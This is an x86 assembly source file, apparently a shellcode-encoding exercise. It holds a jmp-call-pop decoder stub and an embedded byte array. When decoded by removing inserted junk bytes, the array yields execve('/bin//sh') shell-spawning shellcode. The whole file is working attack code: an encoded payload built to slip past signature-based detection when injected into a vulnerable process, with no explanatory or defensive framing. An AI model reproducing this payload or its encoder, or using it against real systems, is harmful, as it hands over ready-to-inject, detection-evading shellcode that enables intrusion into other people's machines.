; Purpose: 

global _start			

section .text
_start:

	jmp short call_shellcode

decoder:
	pop esi
	lea edi, [esi]
	xor eax, eax
	xor ebx, ebx

decode: 
	mov bx, word [esi + eax]

	xor bl, 0xbb
	jz short EncodedShellcode
	mov bl, byte [esi + eax]
	mov byte [edi], bl
	inc edi

        xor bh, 0xbb
        jz short EncodedShellcode
        mov bh, byte [esi + eax + 1]
        mov byte [edi], bh
        inc edi

	add al, 3
	jmp short decode	



call_shellcode:

	call decoder
	EncodedShellcode: db 0x31,0xc0,0x2a,0x50,0x68,0x3b,0x2f,0x2f,0xac,0x73,0x68,0xab,0x68,0x2f,0xcb,0x62,0x69,0xac,0x6e,0x89,0xaa,0xe3,0x50,0xaa,0x89,0xe2,0xca,0x53,0x89,0x3b,0xe1,0xb0,0xaa,0x0b,0xcd,0x1b,0x80,0xBB,0xBB




